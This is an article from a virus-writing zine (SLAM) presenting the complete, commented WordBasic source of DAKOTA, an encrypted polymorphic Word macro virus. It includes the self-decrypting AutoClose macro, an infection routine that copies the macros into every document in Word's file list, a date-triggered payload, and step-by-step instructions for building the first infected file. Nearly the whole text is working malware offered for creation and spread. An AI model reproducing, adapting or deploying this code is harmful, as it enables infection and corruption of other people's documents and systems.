Copy Link
Add to Bookmark
Report
SLAM2.005: The new encrypted Macro Virus DAKOTA
[ WordMacro. DAKOTA ]------------------------
˛ VIRUSNAME: DAKOTA
˛ SIZE: change at every infection
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker
->Polymorf Yes
->Stealth No
->Encrypted Yes
->Retro No
----------------------------------------------
After FutureNot is here now a new polymorphic macro virus.
The virus contains 2 macros (AutoClose and DAKOTA) and 4 document variables:
- CODE (contains the code to infect a file)
- Payload (I think you know it)
- counter (counter for the encryption routine)
- DAKOTA (to check if any file is already infected)
OK, here is the source code:
-----------------------------------------------------------------
MACRO: AutoClose
~~~~~~~~~~~~~~~~
Sub MAIN
REM At first set ScreenUpdating Off and DisableInput On
ScreenUpdating : DisableInput
REM Open the DAKOTA macro, select and copy the complete code.
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit
EditSelectAll : ax$ = Selection$()
REM Now remove all encryption signs.
For ax = 1 To Len(ax$)
bx$ = Mid$(ax$, ax, 1)
If bx$ = Chr$(134) Or bx$ = Chr$(39) Then Goto Nexit
dx$ = dx$ + bx$
Nexit:
Next ax
REM Delete the old encrypted code and insert the new decrypted code.
EditClear - 1 : StartOfDocument : Insert dx$
DocClose 1
REM Run the DAKOTA macro.
DAKOTA
REM Open it again, select and delete the complete code.
ToolsMacro .Name = "DAKOTA", .Show = 3, .Edit
EditSelectAll : EditClear - 1
REM dx$ is the decrypted code of the DAKOTA macro.
REM Encrypt now the code again.
For xx = 1 To Len(dx$)
hx$ = Mid$(dx$, xx, 1)
fx = Rnd() : fx$ = Str$(fx) : fx$ = Right$(fx$, 1) : fx = Val(fx$)
If fx < 3 Then
nj$ = nj$ + hx$ + Chr$(134)
Else
nj$ = nj$ + hx$
End If
Next xx
REM Insert the encrypted code into the DAKOTA macro,
REM go to top of the macro and insert at the
REM beginning of every line a '. We must do that, because
REM Word would insert a space behind every encryption sign and
REM if we decrypt the code again, we will decrypt this space, too.
Insert nj$
StartOfDocument
Insert "'"
For ix = 1 To 40
LineDown 1
StartO-ine
Insert "'"
Next ix
REM Close and save the DAKOTA macro.
REM Run and delete the DAKOTA2 macro.
DocClose 1 : DAKOTA2
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Delete
REM Save all and create a new string for the DAKOTA document variable.
FileSaveAll 1, 0
SetDocumentVar "DAKOTA", Str$(Rnd(v))
REM Set ScreenUpdating On and DisableInput Off
ScreenUpdating : DisableInput 0
End Sub
-----------------------------------------------------------------
MACRO: DAKOTA (of course, decrypted)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sub MAIN
REM Get the encrypted code and the counter for the decrypting routine.
a$ = GetDocumentVar$("CODE")
g$ = GetDocumentVar$("counter") : g = Val(g$)
REM decrypt now the code (a$) with the key (g).
For a = 1 To Len(a$)
b$ = Mid$(a$, a, 1)
b = Asc(Mid$(a$, a, 1))
c = b + g
If c > 255 Then c = c - 256
d$ = d$ + Chr$(c)
Next
REM Generate the new key. (I know thats very lame, but WordBasic
REM is to laaammmeee to make a better encryption routine. :( )
g = g + 1
If g = 255 Then g = 2
REM Open a new macro, called DAKOTA2 and insert
REM the decrypted code.
ToolsMacro .Name = "DAKOTA2", .Show = 3, .Edit
Insert d$
REM Close and save the macro.
DocClose 1 : a$ = "" : b$ = "" : g$ = ""
REM Now encrypt the code with the new key.
For y = 1 To Len(d$)
x = Asc(Mid$(d$, y, 1))
z = x - g
If z < 0 Then z = z + 256
e$ = e$ + Chr$(z)
Next
REM Save the encrypted code and the new key (counter) in
REM a document variable.
SetDocumentVar "counter", Str$(g)
SetDocumentVar "CODE", e$
REM If today is 01/07/xx then
REM get the encrypted code from the Payload document variable.
If Day(Now()) = 1 And Month(Now()) = 7 Then
k2$ = GetDocumentVar$("Payload")
REM Decrypt it!
For ay = 1 To Len(k2$)
b2$ = Mid$(k2$, ay, 1)
b2 = Asc(Mid$(k2$, ay, 1))
c2 = b2 + 1
If c2 > 255 Then c2 = c2 - 256
d2$ = d2$ + Chr$(c2)
Next
REM Open a new macro, called FinalDAKOTA, select and
REM delete the two lines. [Sub Main ... End Sub]
ToolsMacro .Name = "FinalDAKOTA", .Show = 3, .Edit
EditSelectAll : EditClear - 1
REM Insert the decrypted code and save the macro.
REM Set ScreenUpdating On and start the payload.
Insert d2$ : DocClose 1 : ScreenUpdating
FinalDAKOTA
REM Set again ScreenUpdating Off.
ScreenUpdating
End If
End Sub
-----------------------------------------------------------------
"CODE" document variable. (again decrypted)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
REM This code mustn't contain the [MAIN Sub] and [End Sub]
REM string, because if we open a new macro we get this to
REM lines automatic.
REM Set DisableAutoMacros On and get the code from the
REM document variables CODE, counter and Payload.
DisableAutoMacros
ua$ = GetDocumentVar$("CODE")
ub$ = GetDocumentVar$("counter")
uc$ = GetDocumentVar$("Payload")
REM iu$ = the name of the active document.
iu$ = FileName$()
REM Count all document names in the FileList
REM and open every!
For iu = 1 To CountFiles()
If Files$(FileName$(iu)) <> "" Then
FileList iu
REM ju$ = the at the moment active file from the FileList
ju$ = FileName$()
REM If this file isn't the same as the infected one then
REM check if it's allready infected.
If iu$ <> ju$ Then
uu$ = GetDocumentVar$("DAKOTA")
REM If not then save it as a template and copy the macros to it.
If uu$ = "" Then
FileSaveAs .Format = 1
MacroCopy iu$ + ":AutoClose", ju$ + ":", 1
MacroCopy iu$ + ":DAKOTA", ju$ + ":"
REM Save the document variables, too.
SetDocumentVar "CODE", ua$
SetDocumentVar "counter", ub$
SetDocumentVar "DAKOTA", Str$(Rnd())
SetDocumentVar "Payload", uc$
End If
REM At last close and save this file.
FileClose 1
End If
End If
REM Get the next file.
Next iu
REM Set DisableAutoMacros Off.
DisableAutoMacros 0
-----------------------------------------------------------------
"Payload" document variable
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sub MAIN
REM Create a new document.
FileNew
If DocMaximize() Then DocMaximize
DocSize 234, 231
REM Set the right Font, size 36, bold.
Font "Times New Roman"
Bold
FontSize 36
REM Insert "DAKOTA" and "(c) Nightmare Joker & Virtual Boy [SLAM]"
Insert "DAKOTA!"
InsertPara
Bold
FontSize 20
InsertPara
Insert "(c) Nightmare Joker"
InsertPara
InsertPara
Insert "& Virtual Boy [SLAM]"
REM And now let the document jump around the screen. ;-))
WaitCursor 0
If DocMaximize() Then DocMaximize : i = 1
j = DocWindowPosLeft()
k = DocWindowPosTop()
e = j
f = k
a = AppWindowWidth() - DocWindowWidth()
b = AppWindowHeight() - DocWindowHeight() - 90
c = 1
d = 1
g = 1
For l = 0 To 29
While h(a, b, c, d, e, f)
DocWindowPosLeft e
DocWindowPosTop f
e = e + c * g
f = f + d * g
Wend
If e > a Then c = - 1
If f > b Then d = - 1
If e < 0 Then c = 1
If f < 0 Then d = 1
Beep
Next
DocWindowPosLeft j
DocWindowPosTop k
If i Then DocMaximize
End Sub
Function h(a, b, c, d, e, f)
h = 1
If c = 1 Then
If e > a Then h = 0
Else
If e < 0 Then h = 0
End If
If d = 1 Then
If f > b Then h = 0
Else
If f < 0 Then h = 0
End If
End Function
-----------------------------------------------------------------
The most difficult thing at this virus is to start him.
Here is a short description.
At first generate six macros. An AutoOpen, Dakota, CODE, and Payload macro.
Insert now the code. (see above)
IMPORTANT: Remove the tow lines: (MAIN Sub) and (Sub End) from the CODE and Payload macro!!!!!
OK, Now generate the MAKE macro and insert the following code:
-----------------------------------------------------------------
Sub MAIN
REM Generate a new file.
FileNew
REM Save it as a template.
FileSaveAs .Name = "c:\virus.doc", .Format = 1
REM Copy now the macros "AutoOpen" and "DAKOTA" to it.
MacroCopy "Global:AutoOpen", FileName$() + ":AutoOpen"
MacroCopy "Global:DAKOTA", FileName$() + ":DAKOTA"
REM Open the CODE macro and select all.
ToolsMacro .Name = "CODE", .Show = 1, .Edit
EditSelectAll
a$ = Selection$()
REM Close it.
DocClose 2
REM Encrypt now the code.
For a = 1 To Len(a$)
d = Asc(Mid$(a$, a, 1))
e = d - 1
If e > 255 Then e = e - 256
f$ = f$ + Chr$(e)
Next a
REM Save this code in the CODE document variable.
SetDocumentVar "CODE", f$
REM Open now the Payload macro and select all.
ToolsMacro .Name = "Payload", .Show = 1, .Edit
EditSelectAll
b$ = Selection$()
REM Close it.
DocClose 2
REM Again encrypt it!
For a = 1 To Len(b$)
d = Asc(Mid$(b$, a, 1))
e = d - 1
If e > 255 Then e = e - 256
h$ = h$ + Chr$(e)
Next
REM Save the code in the Payload document variable.
SetDocumentVar "Payload", h$
REM Now save the counter and mark the file as infected.
SetDocumentVar "counter", "1"
SetDocumentVar "DAKOTA", "INFECTED"
REM At last save all.
FileSaveAll 1, 0
End Sub
-----------------------------------------------------------------
Start now the MAKE macro and you have a new generation of DAKOTA. :)
- Nightmare Joker -